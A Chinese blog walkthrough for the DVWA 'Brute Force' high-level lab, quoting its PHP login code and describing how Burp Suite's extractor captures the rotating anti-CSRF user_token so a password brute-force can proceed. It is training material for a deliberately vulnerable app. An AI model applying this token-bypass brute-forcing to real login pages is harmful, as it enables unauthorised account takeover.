MENU

burp 随机爆破Token 值

November 13, 2019 • Read: 72 • 安全测试阅读设置

环境:dvwa
关卡:Brute Force high


代码分析

从代码方面看最高等级的Brute Force,添加了随机user_token的验证,我们要爆破的话需要这个user_token才能进行爆破

//添加token,session
if( isset( $_GET[ 'Login' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input
    $user = $_GET[ 'username' ];
    //stripslashes()删除反斜杠
    $user = stripslashes( $user );
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

开干

请求使用随机token值防止爆破
b2f126ec-3d95-4938-a968-680192fd7f9a.png

我们可以通过burp自带提取器进行获取随机爆破token值
注意:爆破随机token值,线程只能为1
f32e9bc0-10e6-4fb8-9f5f-b94da7187695.png

获取需要伪造的token值
9475f708-2b7e-4d18-85ff-217329b814f9.png

设置payload为伪造的token,注意需要添加一个
948974cf-75ba-4076-93da-82bad2220417.png

返回200k,正常爆破
51f68b6f-c64d-4bc8-af0b-15b818b11709.png

Archives QR Code Tip
QR Code for this page
Tipping QR Code